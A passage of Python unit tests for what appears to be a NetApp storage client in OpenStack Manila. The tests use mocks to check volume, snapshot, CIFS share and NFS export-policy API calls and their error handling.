'volume-name': fake.SHARE_NAME,
'junction-path': fake_path,
}
self.client.send_request.assert_has_calls([
mock.call('volume-mount', volume_mount_args)])
def test_offline_volume(self):
self.mock_object(self.client, 'send_request')
self.client.offline_volume(fake.SHARE_NAME)
volume_offline_args = {'name': fake.SHARE_NAME}
self.client.send_request.assert_has_calls([
mock.call('volume-offline', volume_offline_args)])
def test_offline_volume_already_offline(self):
self.mock_object(self.client,
'send_request',
mock.Mock(side_effect=self._mock_api_error(
netapp_api.EVOLUMEOFFLINE)))
self.client.offline_volume(fake.SHARE_NAME)
volume_offline_args = {'name': fake.SHARE_NAME}
self.client.send_request.assert_has_calls([
mock.call('volume-offline', volume_offline_args)])
def test_offline_volume_api_error(self):
self.mock_object(self.client,
'send_request',
mock.Mock(side_effect=self._mock_api_error()))
self.assertRaises(netapp_api.NaApiError,
self.client.offline_volume,
fake.SHARE_NAME)
def test__unmount_volume(self):
self.mock_object(self.client, 'send_request')
self.client._unmount_volume(fake.SHARE_NAME)
volume_unmount_args = {
'volume-name': fake.SHARE_NAME,
'force': 'false'
}
self.client.send_request.assert_has_calls([
mock.call('volume-unmount', volume_unmount_args)])
def test__unmount_volume_force(self):
self.mock_object(self.client, 'send_request')
self.client._unmount_volume(fake.SHARE_NAME, force=True)
volume_unmount_args = {'volume-name': fake.SHARE_NAME, 'force': 'true'}
self.client.send_request.assert_has_calls([
mock.call('volume-unmount', volume_unmount_args)])
def test__unmount_volume_already_unmounted(self):
self.mock_object(self.client,
'send_request',
mock.Mock(side_effect=self._mock_api_error(
netapp_api.EVOL_NOT_MOUNTED)))
self.client._unmount_volume(fake.SHARE_NAME, force=True)
volume_unmount_args = {'volume-name': fake.SHARE_NAME, 'force': 'true'}
self.client.send_request.assert_has_calls([
mock.call('volume-unmount', volume_unmount_args)])
def test__unmount_volume_api_error(self):
self.mock_object(self.client,
'send_request',
mock.Mock(side_effect=self._mock_api_error()))
self.assertRaises(netapp_api.NaApiError,
self.client._unmount_volume,
fake.SHARE_NAME,
force=True)
def test_unmount_volume(self):
self.mock_object(self.client, '_unmount_volume')
self.client.unmount_volume(fake.SHARE_NAME)
self.client._unmount_volume.assert_called_once_with(fake.SHARE_NAME,
force=False)
self.assertEqual(1, client_cmode.LOG.debug.call_count)
self.assertEqual(0, client_cmode.LOG.warning.call_count)
def test_unmount_volume_api_error(self):
self.mock_object(self.client,
'_unmount_volume',
self._mock_api_error())
self.assertRaises(netapp_api.NaApiError,
self.client.unmount_volume,
fake.SHARE_NAME)
self.assertEqual(1, self.client._unmount_volume.call_count)
self.assertEqual(0, client_cmode.LOG.debug.call_count)
self.assertEqual(0, client_cmode.LOG.warning.call_count)
def test_unmount_volume_with_retries(self):
side_effect = [netapp_api.NaApiError(code=netapp_api.EAPIERROR,
message='...job ID...')] * 5
side_effect.append(None)
self.mock_object(self.client,
'_unmount_volume',
mock.Mock(side_effect=side_effect))
self.mock_object(time, 'sleep')
self.client.unmount_volume(fake.SHARE_NAME)
self.assertEqual(6, self.client._unmount_volume.call_count)
self.assertEqual(1, client_cmode.LOG.debug.call_count)
self.assertEqual(5, client_cmode.LOG.warning.call_count)
def test_unmount_volume_with_max_retries(self):
side_effect = [netapp_api.NaApiError(code=netapp_api.EAPIERROR,
message='...job ID...')] * 30
self.mock_object(self.client,
'_unmount_volume',
mock.Mock(side_effect=side_effect))
self.mock_object(time, 'sleep')
self.assertRaises(exception.NetAppException,
self.client.unmount_volume,
fake.SHARE_NAME)
self.assertEqual(10, self.client._unmount_volume.call_count)
self.assertEqual(0, client_cmode.LOG.debug.call_count)
self.assertEqual(10, client_cmode.LOG.warning.call_count)
def test_delete_volume(self):
self.mock_object(self.client, 'send_request')
self.client.delete_volume(fake.SHARE_NAME)
volume_destroy_args = {'name': fake.SHARE_NAME}
self.client.send_request.assert_has_calls([
mock.call('volume-destroy', volume_destroy_args)])
def test_create_snapshot(self):
self.mock_object(self.client, 'send_request')
self.client.create_snapshot(fake.SHARE_NAME, fake.SNAPSHOT_NAME)
snapshot_create_args = {
'volume': fake.SHARE_NAME,
'snapshot': fake.SNAPSHOT_NAME
}
self.client.send_request.assert_has_calls([
mock.call('snapshot-create', snapshot_create_args)])
@ddt.data({
'mock_return': fake.SNAPSHOT_GET_ITER_NOT_BUSY_RESPONSE,
'expected': {
'name': fake.SNAPSHOT_NAME,
'volume': fake.SHARE_NAME,
'busy': False,
'owners': set(),
}
}, {
'mock_return': fake.SNAPSHOT_GET_ITER_BUSY_RESPONSE,
'expected': {
'name': fake.SNAPSHOT_NAME,
'volume': fake.SHARE_NAME,
'busy': True,
'owners': {'volume clone'},
}
})
@ddt.unpack
def test_get_snapshot(self, mock_return, expected):
api_response = netapp_api.NaElement(mock_return)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.get_snapshot(fake.SHARE_NAME, fake.SNAPSHOT_NAME)
snapshot_get_iter_args = {
'query': {
'snapshot-info': {
'name': fake.SNAPSHOT_NAME,
'volume': fake.SHARE_NAME,
},
},
'desired-attributes': {
'snapshot-info': {
'name': None,
'volume': None,
'busy': None,
'snapshot-owners-list': {
'snapshot-owner': None,
}
},
},
}
self.client.send_request.assert_has_calls([
mock.call('snapshot-get-iter', snapshot_get_iter_args)])
self.assertDictEqual(expected, result)
@ddt.data({
'api_response_xml': fake.NO_RECORDS_RESPONSE,
'raised_exception': exception.SnapshotResourceNotFound,
}, {
'api_response_xml': fake.SNAPSHOT_GET_ITER_NOT_UNIQUE_RESPONSE,
'raised_exception': exception.NetAppException,
}, {
'api_response_xml': fake.SNAPSHOT_GET_ITER_UNAVAILABLE_RESPONSE,
'raised_exception': exception.SnapshotUnavailable,
}, {
'api_response_xml': fake.SNAPSHOT_GET_ITER_OTHER_ERROR_RESPONSE,
'raised_exception': exception.NetAppException,
})
@ddt.unpack
def test_get_snapshot_error(self, api_response_xml, raised_exception):
api_response = netapp_api.NaElement(api_response_xml)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
self.assertRaises(raised_exception,
self.client.get_snapshot,
fake.SHARE_NAME,
fake.SNAPSHOT_NAME)
def test_rename_snapshot(self):
self.mock_object(self.client, 'send_request')
self.client.rename_snapshot(fake.SHARE_NAME,
fake.SNAPSHOT_NAME,
'new_snapshot_name')
snapshot_rename_args = {
'volume': fake.SHARE_NAME,
'current-name': fake.SNAPSHOT_NAME,
'new-name': 'new_snapshot_name'
}
self.client.send_request.assert_has_calls([
mock.call('snapshot-rename', snapshot_rename_args)])
def test_delete_snapshot(self):
self.mock_object(self.client, 'send_request')
self.client.delete_snapshot(fake.SHARE_NAME, fake.SNAPSHOT_NAME)
snapshot_delete_args = {
'volume': fake.SHARE_NAME,
'snapshot': fake.SNAPSHOT_NAME
}
self.client.send_request.assert_has_calls([
mock.call('snapshot-delete', snapshot_delete_args)])
def test_soft_delete_snapshot(self):
mock_delete_snapshot = self.mock_object(self.client, 'delete_snapshot')
mock_rename_snapshot = self.mock_object(self.client, 'rename_snapshot')
self.client.soft_delete_snapshot(fake.SHARE_NAME, fake.SNAPSHOT_NAME)
mock_delete_snapshot.assert_called_once_with(
fake.SHARE_NAME, fake.SNAPSHOT_NAME)
self.assertFalse(mock_rename_snapshot.called)
def test_soft_delete_snapshot_api_error(self):
mock_delete_snapshot = self.mock_object(
self.client, 'delete_snapshot', self._mock_api_error())
mock_rename_snapshot = self.mock_object(self.client, 'rename_snapshot')
self.client.soft_delete_snapshot(fake.SHARE_NAME, fake.SNAPSHOT_NAME)
mock_delete_snapshot.assert_called_once_with(
fake.SHARE_NAME, fake.SNAPSHOT_NAME)
mock_rename_snapshot.assert_called_once_with(
fake.SHARE_NAME, fake.SNAPSHOT_NAME,
'deleted_manila_' + fake.SNAPSHOT_NAME)
def test_prune_deleted_snapshots(self):
deleted_snapshots_map = {
'vserver1': [{
'name': 'deleted_snap_1',
'volume': 'fake_volume_1',
'vserver': 'vserver1',
}],
'vserver2': [{
'name': 'deleted_snap_2',
'volume': 'fake_volume_2',
'vserver': 'vserver2',
}],
}
mock_get_deleted_snapshots = self.mock_object(
self.client, '_get_deleted_snapshots',
mock.Mock(return_value=deleted_snapshots_map))
mock_delete_snapshot = self.mock_object(
self.client, 'delete_snapshot',
mock.Mock(side_effect=[None, netapp_api.NaApiError]))
self.mock_object(
copy, 'deepcopy', mock.Mock(return_value=self.client))
self.client.prune_deleted_snapshots()
mock_get_deleted_snapshots.assert_called_once_with()
mock_delete_snapshot.assert_has_calls([
mock.call('fake_volume_1', 'deleted_snap_1'),
mock.call('fake_volume_2', 'deleted_snap_2'),
], any_order=True)
def test_get_deleted_snapshots(self):
api_response = netapp_api.NaElement(
fake.SNAPSHOT_GET_ITER_DELETED_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client._get_deleted_snapshots()
snapshot_get_iter_args = {
'query': {
'snapshot-info': {
'name': 'deleted_manila_*',
'busy': 'false',
},
},
'desired-attributes': {
'snapshot-info': {
'name': None,
'vserver': None,
'volume': None,
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('snapshot-get-iter', snapshot_get_iter_args)])
expected = {
fake.VSERVER_NAME: [{
'name': 'deleted_manila_' + fake.SNAPSHOT_NAME,
'volume': fake.SHARE_NAME,
'vserver': fake.VSERVER_NAME,
}],
}
self.assertDictEqual(expected, result)
def test_create_cg_snapshot(self):
mock_start_cg_snapshot = self.mock_object(
self.client, '_start_cg_snapshot',
mock.Mock(return_value=fake.CG_SNAPSHOT_ID))
mock_commit_cg_snapshot = self.mock_object(
self.client, '_commit_cg_snapshot')
self.client.create_cg_snapshot([fake.SHARE_NAME, fake.SHARE_NAME_2],
fake.SNAPSHOT_NAME)
mock_start_cg_snapshot.assert_called_once_with(
[fake.SHARE_NAME, fake.SHARE_NAME_2], fake.SNAPSHOT_NAME)
mock_commit_cg_snapshot.assert_called_once_with(fake.CG_SNAPSHOT_ID)
def test_create_cg_snapshot_no_id(self):
mock_start_cg_snapshot = self.mock_object(
self.client, '_start_cg_snapshot', mock.Mock(return_value=None))
mock_commit_cg_snapshot = self.mock_object(
self.client, '_commit_cg_snapshot')
self.assertRaises(exception.NetAppException,
self.client.create_cg_snapshot,
[fake.SHARE_NAME, fake.SHARE_NAME_2],
fake.SNAPSHOT_NAME)
mock_start_cg_snapshot.assert_called_once_with(
[fake.SHARE_NAME, fake.SHARE_NAME_2], fake.SNAPSHOT_NAME)
self.assertFalse(mock_commit_cg_snapshot.called)
def test_start_cg_snapshot(self):
self.mock_object(self.client, 'send_request')
self.client._start_cg_snapshot([fake.SHARE_NAME, fake.SHARE_NAME_2],
fake.SNAPSHOT_NAME)
cg_start_args = {
'snapshot': fake.SNAPSHOT_NAME,
'timeout': 'relaxed',
'volumes': [
{'volume-name': fake.SHARE_NAME},
{'volume-name': fake.SHARE_NAME_2},
],
}
self.client.send_request.assert_has_calls([
mock.call('cg-start', cg_start_args)])
def test_commit_cg_snapshot(self):
self.mock_object(self.client, 'send_request')
self.client._commit_cg_snapshot(fake.CG_SNAPSHOT_ID)
cg_commit_args = {'cg-id': fake.CG_SNAPSHOT_ID}
self.client.send_request.assert_has_calls([
mock.call('cg-commit', cg_commit_args)])
def test_create_cifs_share(self):
self.mock_object(self.client, 'send_request')
self.client.create_cifs_share(fake.SHARE_NAME)
cifs_share_create_args = {
'path': '/%s' % fake.SHARE_NAME,
'share-name': fake.SHARE_NAME
}
self.client.send_request.assert_has_calls([
mock.call('cifs-share-create', cifs_share_create_args)])
def test_get_cifs_share_access(self):
api_response = netapp_api.NaElement(
fake.CIFS_SHARE_ACCESS_CONTROL_GET_ITER)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_cifs_share_access(fake.SHARE_NAME)
cifs_share_access_control_get_iter_args = {
'query': {
'cifs-share-access-control': {
'share': fake.SHARE_NAME,
},
},
'desired-attributes': {
'cifs-share-access-control': {
'user-or-group': None,
'permission': None,
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('cifs-share-access-control-get-iter',
cifs_share_access_control_get_iter_args)])
expected = {
'Administrator': 'full_control',
'Administrators': 'change',
'Power Users': 'read',
'Users': 'no_access',
}
self.assertDictEqual(expected, result)
def test_get_cifs_share_access_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_cifs_share_access(fake.SHARE_NAME)
self.assertEqual({}, result)
@ddt.data(True, False)
def test_add_cifs_share_access(self, readonly):
self.mock_object(self.client, 'send_request')
self.client.add_cifs_share_access(fake.SHARE_NAME,
fake.USER_NAME,
readonly)
cifs_share_access_control_create_args = {
'permission': 'read' if readonly else 'full_control',
'share': fake.SHARE_NAME,
'user-or-group': fake.USER_NAME
}
self.client.send_request.assert_has_calls([
mock.call(
'cifs-share-access-control-create',
cifs_share_access_control_create_args)])
@ddt.data(True, False)
def test_modify_cifs_share_access(self, readonly):
self.mock_object(self.client, 'send_request')
self.client.modify_cifs_share_access(fake.SHARE_NAME,
fake.USER_NAME,
readonly)
cifs_share_access_control_modify_args = {
'permission': 'read' if readonly else 'full_control',
'share': fake.SHARE_NAME,
'user-or-group': fake.USER_NAME
}
self.client.send_request.assert_has_calls([
mock.call(
'cifs-share-access-control-modify',
cifs_share_access_control_modify_args)])
def test_remove_cifs_share_access(self):
self.mock_object(self.client, 'send_request')
self.client.remove_cifs_share_access(fake.SHARE_NAME, fake.USER_NAME)
cifs_share_access_control_delete_args = {
'user-or-group': fake.USER_NAME,
'share': fake.SHARE_NAME
}
self.client.send_request.assert_has_calls([
mock.call(
'cifs-share-access-control-delete',
cifs_share_access_control_delete_args)])
def test_remove_cifs_share(self):
self.mock_object(self.client, 'send_request')
self.client.remove_cifs_share(fake.SHARE_NAME)
cifs_share_delete_args = {'share-name': fake.SHARE_NAME}
self.client.send_request.assert_has_calls([
mock.call('cifs-share-delete', cifs_share_delete_args)])
def test_add_nfs_export_rule(self):
mock_get_nfs_export_rule_indices = self.mock_object(
self.client, '_get_nfs_export_rule_indices',
mock.Mock(return_value=[]))
mock_add_nfs_export_rule = self.mock_object(
self.client, '_add_nfs_export_rule')
mock_update_nfs_export_rule = self.mock_object(
self.client, '_update_nfs_export_rule')
self.client.add_nfs_export_rule(fake.EXPORT_POLICY_NAME,
fake.IP_ADDRESS,
False)
mock_get_nfs_export_rule_indices.assert_called_once_with(
fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS)
mock_add_nfs_export_rule.assert_called_once_with(
fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS, False)
self.assertFalse(mock_update_nfs_export_rule.called)
def test_add_nfs_export_rule_single_existing(self):
mock_get_nfs_export_rule_indices = self.mock_object(
self.client, '_get_nfs_export_rule_indices',
mock.Mock(return_value=['1']))
mock_add_nfs_export_rule = self.mock_object(
self.client, '_add_nfs_export_rule')
mock_update_nfs_export_rule = self.mock_object(
self.client, '_update_nfs_export_rule')
mock_remove_nfs_export_rules = self.mock_object(
self.client, '_remove_nfs_export_rules')
self.client.add_nfs_export_rule(fake.EXPORT_POLICY_NAME,
fake.IP_ADDRESS,
False)
mock_get_nfs_export_rule_indices.assert_called_once_with(
fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS)
self.assertFalse(mock_add_nfs_export_rule.called)
mock_update_nfs_export_rule.assert_called_once_with(
fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS, False, '1')
mock_remove_nfs_export_rules.assert_called_once_with(
fake.EXPORT_POLICY_NAME, [])
def test_add_nfs_export_rule_multiple_existing(self):
mock_get_nfs_export_rule_indices = self.mock_object(
self.client, '_get_nfs_export_rule_indices',
mock.Mock(return_value=['2', '4', '6']))
mock_add_nfs_export_rule = self.mock_object(
self.client, '_add_nfs_export_rule')
mock_update_nfs_export_rule = self.mock_object(
self.client, '_update_nfs_export_rule')
mock_remove_nfs_export_rules = self.mock_object(
self.client, '_remove_nfs_export_rules')
self.client.add_nfs_export_rule(fake.EXPORT_POLICY_NAME,
fake.IP_ADDRESS,
False)
mock_get_nfs_export_rule_indices.assert_called_once_with(
fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS)
self.assertFalse(mock_add_nfs_export_rule.called)
mock_update_nfs_export_rule.assert_called_once_with(
fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS, False, '2')
mock_remove_nfs_export_rules.assert_called_once_with(
fake.EXPORT_POLICY_NAME, ['4', '6'])
@ddt.data({'readonly': False, 'rw_security_flavor': 'sys'},
{'readonly': True, 'rw_security_flavor': 'never'})
@ddt.unpack
def test__add_nfs_export_rule(self, readonly, rw_security_flavor):
self.mock_object(self.client, 'send_request')
self.client._add_nfs_export_rule(fake.EXPORT_POLICY_NAME,
fake.IP_ADDRESS,
readonly)
export_rule_create_args = {
'policy-name': fake.EXPORT_POLICY_NAME,
'client-match': fake.IP_ADDRESS,
'ro-rule': {
'security-flavor': 'sys',
},
'rw-rule': {
'security-flavor': rw_security_flavor,
},
'super-user-security': {
'security-flavor': 'sys',
},
}
self.client.send_request.assert_has_calls(
[mock.call('export-rule-create', export_rule_create_args)])
@ddt.data({'readonly': False, 'rw_security_flavor': 'sys', 'index': '2'},
{'readonly': True, 'rw_security_flavor': 'never', 'index': '4'})
@ddt.unpack
def test_update_nfs_export_rule(self, readonly, rw_security_flavor, index):
self.mock_object(self.client, 'send_request')
self.client._update_nfs_export_rule(fake.EXPORT_POLICY_NAME,
fake.IP_ADDRESS,
readonly,
index)
export_rule_modify_args = {
'policy-name': fake.EXPORT_POLICY_NAME,
'rule-index': index,
'client-match': fake.IP_ADDRESS,
'ro-rule': {
'security-flavor': 'sys',
},
'rw-rule': {
'security-flavor': rw_security_flavor,
},
'super-user-security': {
'security-flavor': 'sys',
},
}
self.client.send_request.assert_has_calls(
[mock.call('export-rule-modify', export_rule_modify_args)])
def test_get_nfs_export_rule_indices(self):
api_response = netapp_api.NaElement(fake.EXPORT_RULE_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client._get_nfs_export_rule_indices(
fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS)
export_rule_get_iter_args = {
'query': {
'export-rule-info': {
'policy-name': fake.EXPORT_POLICY_NAME,
'client-match': fake.IP_ADDRESS,
},
},
'desired-attributes': {
'export-rule-info': {
'vserver-name': None,
'policy-name': None,
'client-match': None,
'rule-index': None,
},
},
}
self.assertListEqual(['1', '3'], result)
self.client.send_iter_request.assert_has_calls([
mock.call('export-rule-get-iter', export_rule_get_iter_args)])
def test_remove_nfs_export_rule(self):
fake_indices = ['1', '3', '4']
mock_get_nfs_export_rule_indices = self.mock_object(
self.client, '_get_nfs_export_rule_indices',
mock.Mock(return_value=fake_indices))
mock_remove_nfs_export_rules = self.mock_object(
self.client, '_remove_nfs_export_rules')
self.client.remove_nfs_export_rule(fake.EXPORT_POLICY_NAME,
fake.IP_ADDRESS)
mock_get_nfs_export_rule_indices.assert_called_once_with(
fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS)
mock_remove_nfs_export_rules.assert_called_once_with(
fake.EXPORT_POLICY_NAME, fake_indices)
def test_remove_nfs_export_rules(self):
fake_indices = ['1', '3']
self.mock_object(self.client, 'send_request')
self.client._remove_nfs_export_rules(fake.EXPORT_POLICY_NAME,
fake_indices)
self.client.send_request.assert_has_calls([
mock.call(
'export-rule-destroy',
{'policy-name': fake.EXPORT_POLICY_NAME, 'rule-index': '1'}),
mock.call(
'export-rule-destroy',
{'policy-name': fake.EXPORT_POLICY_NAME, 'rule-index': '3'})])
def test_remove_nfs_export_rules_not_found(self):
self.mock_object(self.client,
'send_request',
self._mock_api_error(code=netapp_api.EOBJECTNOTFOUND))
self.client._remove_nfs_export_rules(fake.EXPORT_POLICY_NAME, ['1'])
self.client.send_request.assert_has_calls([
mock.call(
'export-rule-destroy',
{'policy-name': fake.EXPORT_POLICY_NAME, 'rule-index': '1'})])
def test_remove_nfs_export_rules_api_error(self):
self.mock_object(self.client, 'send_request', self._mock_api_error())
self.assertRaises(netapp_api.NaApiError,
self.client._remove_nfs_export_rules,
fake.EXPORT_POLICY_NAME,
['1'])
def test_clear_nfs_export_policy_for_volume(self):
mock_set_nfs_export_policy_for_volume = self.mock_object(
self.client, 'set_nfs_export_policy_for_volume')
self.client.clear_nfs_export_policy_for_volume(fake.SHARE_NAME)
mock_set_nfs_export_policy_for_volume.assert_called_once_with(
fake.SHARE_NAME, 'default')
def test_set_nfs_export_policy_for_volume(self):
self.mock_object(self.client, 'send_request')
self.client.set_nfs_export_policy_for_volume(fake.SHARE_NAME,
fake.EXPORT_POLICY_NAME)
volume_modify_iter_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'name': fake.SHARE_NAME,
},
},
},
'attributes': {
'volume-attributes': {
'volume-export-attributes': {
'policy': fake.EXPORT_POLICY_NAME,
},
},
},
}
self.client.send_request.assert_has_calls([
mock.call('volume-modify-iter', volume_modify_iter_args)])
def test_get_nfs_export_policy_for_volume(self):
api_response = netapp_api.NaElement(
fake.VOLUME_GET_EXPORT_POLICY_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_nfs_export_policy_for_volume(fake.SHARE_NAME)
volume_get_iter_args = {
'query': {
'volume-attributes': {
'volume-id-attributes': {
'name': fake.SHARE_NAME,
},
},
},
'desired-attributes': {
'volume-attributes': {
'volume-export-attributes': {
'policy': None,
},
},
},
}
self.assertEqual(fake.EXPORT_POLICY_NAME, result)
self.client.send_iter_request.assert_has_calls([
mock.call('volume-get-iter', volume_get_iter_args)])
def test_get_nfs_export_policy_for_volume_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
self.assertRaises(exception.NetAppException,
self.client.get_nfs_export_policy_for_volume,
fake.SHARE_NAME)
def test_create_nfs_export_policy(self):
self.mock_object(self.client, 'send_request')
self.client.create_nfs_export_policy(fake.EXPORT_POLICY_NAME)
export_policy_create_args = {'policy-name': fake.EXPORT_POLICY_NAME}
self.client.send_request.assert_has_calls([
mock.call('export-policy-create', export_policy_create_args)])
def test_create_nfs_export_policy_already_present(self):
self.mock_object(self.client,
'send_request',
self._mock_api_error(code=netapp_api.EDUPLICATEENTRY))
self.client.create_nfs_export_policy(fake.EXPORT_POLICY_NAME)
export_policy_create_args = {'policy-name': fake.EXPORT_POLICY_NAME}
self.client.send_request.assert_has_calls([
mock.call('export-policy-create', export_policy_create_args)])
def test_create_nfs_export_policy_api_error(self):
self.mock_object(self.client, 'send_request', self._mock_api_error())
self.assertRaises(netapp_api.NaApiError,
self.client.create_nfs_export_policy,
fake.EXPORT_POLICY_NAME)
def test_soft_delete_nfs_export_policy(self):
self.mock_object(self.client, 'delete_nfs_export_policy')
self.mock_object(self.client, 'rename_nfs_export_policy')
self.client.soft_delete_nfs_export_policy(fake.EXPORT_POLICY_NAME)
self.client.delete_nfs_export_policy.assert_has_calls([
mock.call(fake.EXPORT_POLICY_NAME)])
self.assertFalse(self.client.rename_nfs_export_policy.called)
def test_soft_delete_nfs_export_policy_api_error(self):
self.mock_object(self.client,
'delete_nfs_export_policy',
self._mock_api_error())
self.mock_object(self.client, 'rename_nfs_export_policy')
self.client.soft_delete_nfs_export_policy(fake.EXPORT_POLICY_NAME)
self.client.delete_nfs_export_policy.assert_has_calls([
mock.call(fake.EXPORT_POLICY_NAME)])
self.assertTrue(self.client.rename_nfs_export_policy.called)
def test_delete_nfs_export_policy(self):
self.mock_object(self.client, 'send_request')
self.client.delete_nfs_export_policy(fake.EXPORT_POLICY_NAME)
export_policy_destroy_args = {'policy-name': fake.EXPORT_POLICY_NAME}
self.client.send_request.assert_has_calls([
mock.call('export-policy-destroy', export_policy_destroy_args)])
def test_delete_nfs_export_policy_not_found(self):
self.mock_object(self.client,
'send_request',
self._mock_api_error(code=netapp_api.EOBJECTNOTFOUND))
self.client.delete_nfs_export_policy(fake.EXPORT_POLICY_NAME)
export_policy_destroy_args = {'policy-name': fake.EXPORT_POLICY_NAME}
self.client.send_request.assert_has_calls([
mock.call('export-policy-destroy', export_policy_destroy_args)])
def test_delete_nfs_export_policy_api_error(self):
self.mock_object(self.client, 'send_request', self._mock_api_error())
self.assertRaises(netapp_api.NaApiError,
self.client.delete_nfs_export_policy,
fake.EXPORT_POLICY_NAME)
def test_rename_nfs_export_policy(self):
self.mock_object(self.client, 'send_request')
self.client.rename_nfs_export_policy(fake.EXPORT_POLICY_NAME,
'new_policy_name')
export_policy_rename_args = {
'policy-name': fake.EXPORT_POLICY_NAME,
'new-policy-name': 'new_policy_name'
}
self.client.send_request.assert_has_calls([
mock.call('export-policy-rename', export_policy_rename_args)])
def test_prune_deleted_nfs_export_policies(self):
# Mock client lest we not be able to see calls on its copy.
self.mock_object(copy,
'deepcopy',
mock.Mock(return_value=self.client))
self.mock_object(self.client,
'_get_deleted_nfs_export_policies',
mock.Mock(return_value=fake.DELETED_EXPORT_POLICIES))
self.mock_object(self.client, 'delete_nfs_export_policy')
self.client.prune_deleted_nfs_export_policies()
self.assertTrue(self.client.delete_nfs_export_policy.called)
self.client.delete_nfs_export_policy.assert_has_calls(
[mock.call(policy) for policy in
fake.DELETED_EXPORT_POLICIES[fake.VSERVER_NAME]])
def test_prune_deleted_nfs_export_policies_api_error(self):
self.mock_object(copy,
'deepcopy',
mock.Mock(return_value=self.client))
self.mock_object(self.client,
'_get_deleted_nfs_export_policies',
mock.Mock(return_value=fake.DELETED_EXPORT_POLICIES))
self.mock_object(self.client,
'delete_nfs_export_policy',
self._mock_api_error())
self.client.prune_deleted_nfs_export_policies()
self.assertTrue(self.client.delete_nfs_export_policy.called)
self.client.delete_nfs_export_policy.assert_has_calls(
[mock.call(policy) for policy in
fake.DELETED_EXPORT_POLICIES[fake.VSERVER_NAME]])
def test_get_deleted_nfs_export_policies(self):
api_response = netapp_api.NaElement(
fake.DELETED_EXPORT_POLICY_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client._get_deleted_nfs_export_policies()
export_policy_get_iter_args = {
'query': {
'export-policy-info': {
'policy-name': 'deleted_manila_*',
},
},
'desired-attributes': {
'export-policy-info': {
'policy-name': None,
'vserver': None,
},
},
}
self.assertSequenceEqual(fake.DELETED_EXPORT_POLICIES, result)
self.client.send_iter_request.assert_has_calls([
mock.call('export-policy-get-iter', export_policy_get_iter_args)])
def test_get_ems_log_destination_vserver(self):
self.mock_object(self.client,
'get_ontapi_version',
mock.Mock(return_value=(1, 21)))
mock_list_vservers = self.mock_object(
self.client,
'list_vservers',
mock.Mock(return_value=[fake.ADMIN_VSERVER_NAME]))
result = self.client._get_ems_log_destination_vserver()
mock_list_vservers.assert_called_once_with(vserver_type='admin')
self.assertEqual(fake.ADMIN_VSERVER_NAME, result)
def test_get_ems_log_destination_vserver_future(self):
self.mock_object(self.client,
'get_ontapi_version',
mock.Mock(return_value=(2, 0)))
mock_list_vservers = self.mock_object(
self.client,
'list_vservers',
mock.Mock(return_value=[fake.ADMIN_VSERVER_NAME]))
result = self.client._get_ems_log_destination_vserver()
mock_list_vservers.assert_called_once_with(vserver_type='admin')
self.assertEqual(fake.ADMIN_VSERVER_NAME, result)
def test_get_ems_log_destination_vserver_legacy(self):
self.mock_object(self.client,
'get_ontapi_version',
mock.Mock(return_value=(1, 15)))
mock_list_vservers = self.mock_object(
self.client,
'list_vservers',
mock.Mock(return_value=[fake.NODE_VSERVER_NAME]))
result = self.client._get_ems_log_destination_vserver()
mock_list_vservers.assert_called_once_with(vserver_type='node')
self.assertEqual(fake.NODE_VSERVER_NAME, result)
def test_get_ems_log_destination_no_cluster_creds(self):
self.mock_object(self.client,
'get_ontapi_version',
mock.Mock(return_value=(1, 21)))
mock_list_vservers = self.mock_object(
self.client,
'list_vservers',
mock.Mock(side_effect=[[], [fake.VSERVER_NAME]]))
result = self.client._get_ems_log_destination_vserver()
mock_list_vservers.assert_has_calls([
mock.call(vserver_type='admin'),
mock.call(vserver_type='data')])
self.assertEqual(fake.VSERVER_NAME, result)
def test_get_ems_log_destination_vserver_not_found(self):
self.mock_object(self.client,
'get_ontapi_version',
mock.Mock(return_value=(1, 21)))
mock_list_vservers = self.mock_object(
self.client,
'list_vservers',
mock.Mock(return_value=[]))
self.assertRaises(exception.NotFound,
self.client._get_ems_log_destination_vserver)
mock_list_vservers.assert_has_calls([
mock.call(vserver_type='admin'),
mock.call(vserver_type='data'),
mock.call(vserver_type='node')])
def test_send_ems_log_message(self):
# Mock client lest we not be able to see calls on its copy.
self.mock_object(copy,
'deepcopy',
mock.Mock(return_value=self.client))
self.mock_object(self.client,
'_get_ems_log_destination_vserver',
mock.Mock(return_value=fake.ADMIN_VSERVER_NAME))
self.mock_object(self.client, 'send_request')
self.client.send_ems_log_message(fake.EMS_MESSAGE)
self.client.send_request.assert_has_calls([
mock.call('ems-autosupport-log', fake.EMS_MESSAGE)])
self.assertEqual(1, client_cmode.LOG.debug.call_count)
def test_send_ems_log_message_api_error(self):
# Mock client lest we not be able to see calls on its copy.
self.mock_object(copy,
'deepcopy',
mock.Mock(return_value=self.client))
self.mock_object(self.client,
'_get_ems_log_destination_vserver',
mock.Mock(return_value=fake.ADMIN_VSERVER_NAME))
self.mock_object(self.client, 'send_request', self._mock_api_error())
self.client.send_ems_log_message(fake.EMS_MESSAGE)
self.client.send_request.assert_has_calls([
mock.call('ems-autosupport-log', fake.EMS_MESSAGE)])
self.assertEqual(1, client_cmode.LOG.warning.call_count)
